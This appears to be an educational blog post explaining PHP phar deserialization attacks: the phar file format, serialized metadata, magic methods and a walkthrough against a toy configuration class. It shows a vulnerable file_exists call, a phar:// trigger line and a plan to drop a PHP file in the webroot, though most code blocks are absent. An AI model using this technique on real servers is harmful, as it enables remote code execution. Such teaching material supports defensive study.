Phar Deserialization Attacks Explained

In this blog post we will take a closer look at Phar Deserialization Attacks in PHP including the phar file format and deserialization attacks in general. Since it was requested, I will add some short comments about how I approached this research between sections.


Reading about PHP vulnerabilities is always an adventure. Many of them are so counter intuitive and hard to prevent for developers, that you are genuinely interested what its inventors were thinking when they've made certain design choices.

I think however, that a lot of the hate PHP gets is undeserved. Sure, especially older versions of PHP were susceptible to a wide range of security flaws. Some convenient features, such as the infamous register_globals setting, that would allow users to set variables using POST or GET variables, were application safety hazards. However, truth of the matter is, that these vulnerabilities were simply not widely known or exploited back then.

That however, usually does not stop me from scratching my head when I stumble upon some of these design decisions and one of the most striking examples are Phar Deserialization Attacks. They are the reason why a relatively harmless function call like the one below can prove to be fatal to your application's safety.

file_exists($_GET['file']);

But how can such a simple - and presumably side-effect free function call have such severe consequences? It's complicated, but we'll figure it out within this blog post.

The Phar File Format

It all starts with a file format called phar - short for PHP Archives. These archives are great, because they allow you to bundle all the program code, assets and libraries that you may need for your application in one single file. If you're thinking back to the days where we had no fancy CI/CD pipelines, you may come to the conclusion that this is kind of a cool way to make file transfers easier. Just bundle your application as phar file, upload it to your server via FTP and you are all set.

Gladly those days are over, but thinking about it, that whole phar concept may make you wonder. "How are these files actually stored? Is there any signature in case of corrupted data? Can we add our own meta data for processing by external tools?" - all of which are valid questions. We'll answer these by looking at PHP's phar file documentation - which is luckily pretty verbose.

πŸ“š
Note: The documentation was one of the first places where I started my research. I roughly knew about the concept of phar deserialization, but not about all of the low level details.

It turns out that the components of a phar file are pretty straight forward. This is all you need:

A stub

The stub is some PHP code that is put at the beginning of a phar file. A required part of this code is a call to __HALT_COMPILER(). Why this is necessary will be clearer later, for now, just know that this is required.

A manifest

The manifest contains some important meta-data. This includes the file size, the name of the phar file and some other variables, notably a subsection with arbitrary user-defined meta data in a specific format. While that does not seem to have security implications at first glance, this is actually what makes phar files so dangerous. We'll talk about that in a second.

The actual file contents

As mentioned, you can store anything in a phar file. Static assets, PHP code, libraries, you name it. This is insanely convenient when you want to bundle an application, since everything you need is inside this single file.

An (optional) signature

This threw me off a bit. My first association when I read "signatures" was that they may prevent you from loading tampered files, yet what's meant here are checksums that prevent a corrupted file from being loaded.

The phar file manifest

The real magic happens in the meta-data though. Let's take a closer look at PHP's documentation to get an understanding about how it is structured.

The phar file manifest

As you can see, there are many interesting properties, but for the experienced PHP exploiter there is one entry sticking out. If you take a look at the last entry in the picture, you will notice that File Meta-data is stored in PHP's serialize format, relating to one of php's most notoriously insecure functions - unserialize.

πŸ“š
This is the most important part of the vulnerability. The serialize/unserialize functions that are called internally. I was familiar with them before, but if you aren't, they may be overwhelming at first. That's why it's important to branch out your research if you are thinking about learning a new topic. Learning is not a straight line, there are many related concepts that seem overwhelming at first. Try understanding them one step at a time and things get easier.

To check whether PHP's unserialize function is indeed involved, let's create a phar file and look at its content. Creating one is pretty straight forward. PHP provides a simple way of doing so.

As you can see, we are adding the most important data to create a minimal phar file. We set it's name during initialization, set the meta data to an array with random info, create the stub with the __HALT_COMPILER call and add a simple file called _ with the content _. You need to ensure that you set the phar.readonly setting to 0 (zero).

Below is the hex representation of the created file.

Some things are clear now by looking at that. First of all, why the __HALT_COMPILER call is necessary. It allows you to treat the file as a valid PHP file, since the stub was placed right at the beginning. So if you call php test.phar it will run the PHP code in the stub and then stop parsing when the internal manifest and file contents start.

The interesting bit is buried within all of the random looking bytes: the user-controllable meta-data. Our ["random"=>"info"] array was turned into this cryptic looking string: a:1:{s:6:"random";s:4:"info";} which is our array, but in PHP's serialize format. Why and how is this dangerous?

πŸ“š
Again, I was already familiar with serialize, so it was not hard to spot for me within the meta-data. If you are trying to learn about a new vulnerability, ensure you know how it looks like at a low level. Don't just copy & paste exploit code. Check what is actually passed over the wire and open it in a hex editor. You'll notice pattern as you gain experience.

The serialize format

This format is fascinating to me. It allows you to convert PHP's complex data structures into a simple string representation. I won't go into detail of the format here, to keep this post (at least somewhat) simple but you can easily find that information online.

Usually when you are programming you know where your data is coming from and where it is going. Say, you're programming a class for handling configuration files. You may have methods for reading and writing configuration options for example and maybe a function to store and retrieve it from the file system. The assumption is that you have clear control over the content of the properties within this class. Nobody can change them without writing additional program code to do so. Deserialization however, with the right combination of existing code, can break that assumption. Let's take a look how.

The magic of methods πŸͺ„

Assume we have a configuration class like the one below.

This one is pretty straight forward. As in the written example above, there are methods to get and set data and there is one to read and store the configuration. One function however sticks out. There is a loadConfig function that you could call directly. But there is also this weird __wakeup function with the same functionality. So why would you need two methods, doing the same thing?

Introducing: Magic Methods. Well admittedly it's not the Disney World kind of magic, but they still have an interesting property: you don't have to call them explicitly. The way this works is simple. There are different magic methods, each of them is called in a different kind of situation. A commonly encountered one is the constructor function at the beginning. This one is called when an object of the class is created using the new keyword.

The __wakeup function on the other hand is called upon deserialization of a serialized object of the class. So it will simply call the loadConfig class in our example. There is a problem however. The __construct function is never called, yet some important variables are set in there. Where are these variables coming from now?

Well, we are turning the complete object, including the state it's in to a string representation. That means that within the serialized string, there is a raw representation of any property of that object. Nothing prevents us from just passing our own properties and any arbitrary values within a specially crafted serialized object.

πŸ“š
Writing an exploit is not that difficult if you are the one who wrote the example. But in real world cases I have encountered very complex chains of different classes, properties and methods that need to be combined to be vulnerable. Again this get easier the more you do it and is one of my favorite parts of this kind of research.Β 

Writing an exploit

Looking at the code, we can think of an exploitation strategy. Within the loadConfig method there are 2 different possible code paths. One of them is loading and decoding an existing file, the other one is creating a new file with the standard config in the JSON format. Loading an existing file won't be very useful for us, but writing a file is! For our example we will just write it into the /tmp folder, but in a real world scenario you would instead choose the webroot.

So how are we gonna do that? In this case we would need to overwrite the default config with our payload and the config file path with a path to /tmp/owned.php. Also remember that the deserialization is triggered when we load a phar file and php tries to decode its meta data. So we need to create a phar file similarly to how we did it above, and set the metadata to a suitable object. Here is how I did it.

You can see the creation of the object and the fact that we set it as meta data.

This created a phar file called pwn.phar on our local machine. If we now upload it to the web server, and trigger the deserialization with the help of the phar stream wrapper within our exposed file_exists function like so file_exists('phar:///path/pwn.phar') we are able to create a PHP file in our chosen location. Since the code stores our payload in JSON encoding we need to be careful with backslashes and double quotes.

Once we trigger the code we can confirm that we indeed created a file in the /tmp directory with the following content.

That’s all there is to phar deserialization! To recap:

  • phar files are PHP archives
  • They can contain serialized data in their user-controlled meta-data
  • We can set this to an arbitrary PHP object and supply any property values that we choose
  • In order to exploit them we need existing code of which we overwrite values in a way that's advantageous for us
  • Once we upload the phar file to the server, we can trigger it with the phar:// stream wrapper and an exposed function that accepts it
Thanks so much for reading. I've learned heaps during research and I will likely keep these blog posts coming. If you've enjoyed the topic and don't want to miss the next one, please consider following me on twitter: @ret2bed